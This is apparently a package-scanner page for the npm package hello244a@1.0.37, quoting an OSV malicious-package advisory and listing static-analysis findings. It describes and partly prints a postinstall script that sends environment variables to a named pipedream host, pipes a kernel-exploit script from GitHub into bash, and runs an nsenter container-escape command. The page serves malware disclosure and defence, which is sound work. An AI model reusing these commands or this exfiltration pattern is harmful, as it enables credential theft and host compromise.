registry  /  hello244a  /  1.0.37

hello244a@1.0.37

OSV Malicious Advisory

scanned 4h ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-5188 confirms this npm version as malicious. package.json declares a postinstall script that, on npm install, (1) enumerates process.env plus os.hostname(), os.platform(), os.arch(), and whoami output, base64-encodes the collected data, and issues an HTTP GET to a hardcoded pipedream request-bin at http://eodxy50gl486xrx.m.pipedream.net/, exfiltrating installer environment variables and host identity to an attacker-controlled endpoint over cleartext HTTP; (2)...

Advisory
MAL-2026-5188
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in hello244a (npm)
Details
package.json declares a postinstall script that, on npm install, (1) enumerates process.env plus os.hostname(), os.platform(), os.arch(), and whoami output, base64-encodes the collected data, and issues an HTTP GET to a hardcoded pipedream request-bin at http://eodxy50gl486xrx.m.pipedream.net/, exfiltrating installer environment variables and host identity to an attacker-controlled endpoint over cleartext HTTP; (2) on Linux, executes `curl -s https://raw.githubusercontent.com/Akabe1/akabe1.github.io/master/_posts/exploits/cve-2021-22555/exploit.sh | bash`, fetching and running an unpinned third-party shell script referencing a known Linux kernel local-privilege-escalation CVE; (3) attempts container/sandbox escape via `nsenter --mount=/proc/1/ns/mnt -- /bin/sh` on Linux and `docker exec` against running containers on Windows, with results reported back to the same pipedream endpoint. Behavior fires automatically on `npm install` with no user interaction. Installer harm is concrete: environment variables (which routinely contain credentials, tokens, and CI secrets) plus host identity are leaked to the attacker, and arbitrary attacker-controlled code executes in the installer's user context with privilege-escalation and container-escape attempts. ## Source: ossf-package-analysis (91844b3ed7a531e129cbdeef1746ccd1e8e981f74da00aa2a4aef2edf6b47dbf) The OpenSSF Package Analysis project identified 'hello244a' @ 1.0.12 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity. - The package executes one or more commands associated with malicious behavior.
Decision reason
High-risk behavior combination matched malicious policy.

Decision evidence

public snapshot
Behavioral surface
SourceNo risky source behavior triggered.
Supply chainNo supply-chain packaging signals triggered.
Manifest
NoLicense
scanned 0 file(s), 0 B of source

Source & flagged code

5 flagged · loading source
package.jsonView file
scripts.postinstall = node -e "const os=require('os'),cp=require('child_process'),https=require('https');(function(){let d={platform:os.platform(),arch:os.arch(),host:os.hostname(),user:process.env.USER...
Critical
Red Install Lifecycle Script

Install-time lifecycle script matches a deterministic static-gate block pattern.

package.jsonView on unpkg
scripts.postinstall = node -e "const os=require('os'),cp=require('child_process'),https=require('https');(function(){let d={platform:os.platform(),arch:os.arch(),host:os.hostname(),user:process.env.USER...
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
package.json#scripts.postinstallView file
1"const os=require('os'),cp=require('child_process'),https=require('https');(function(){let d={platform:os.platform(),arch:os.arch(),host:os.hostname(),user:process.env.USERNAME||pr...
Critical
Same File Env Network Execution

A single source file combines environment access, network access, and code or shell execution with blocking evidence.

package.json#scripts.postinstallView on unpkg · L1
1"const os=require('os'),cp=require('child_process'),https=require('https');(function(){let d={platform:os.platform(),arch:os.arch(),host:os.hostname(),user:process.env.USERNAME||pr...
Critical
Credential Exfiltration

Source appears to send environment or credential material to an external endpoint.

package.json#scripts.postinstallView on unpkg · L1
1"const os=require('os'),cp=require('child_process'),https=require('https');(function(){let d={platform:os.platform(),arch:os.arch(),host:os.hostname(),user:process.env.USERNAME||pr...
High
Sandbox Evasion Gated Capability

Source gates dangerous network, credential, or execution behavior behind CI, host, platform, time, or geo fingerprint checks.

package.json#scripts.postinstallView on unpkg · L1

Findings

3 Critical2 High1 Medium2 Low
CriticalRed Install Lifecycle Scriptpackage.json
CriticalSame File Env Network Executionpackage.json#scripts.postinstall
CriticalCredential Exfiltrationpackage.json#scripts.postinstall
HighInstall Time Lifecycle Scriptspackage.json
HighSandbox Evasion Gated Capabilitypackage.json#scripts.postinstall
MediumStructural Risk Force Deep Review
LowScripts Present
LowNo License